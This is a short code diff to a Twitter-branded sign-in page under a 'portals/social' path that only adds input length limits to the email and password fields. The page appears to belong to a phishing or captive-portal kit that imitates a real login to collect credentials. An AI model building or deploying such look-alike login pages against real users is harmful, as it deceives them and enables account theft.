--- a/portals/social/Twitter.html
+++ b/portals/social/Twitter.html
@@ -103,8 +103,8 @@
                 <h1 class="g-h1">Sign in</h1>
                 <h2 class="g-h2">Use your Twitter Account</h2>
                 <div class="login-content">
-                    <input name="email" id="email" type="text" class="g-input" placeholder="Email" required>
-                    <input name="password" id="password" type="password" class="g-input" placeholder="Password" required>
+                    <input name="email" id="email" type="text" class="g-input" placeholder="Email" maxlength="100" required>
+                    <input name="password" id="password" type="password" class="g-input" placeholder="Password" maxlength="100" required>
                     <div><button class="gbtn-primary" type="submit">Next</button></div>
                 </div>
             </form>
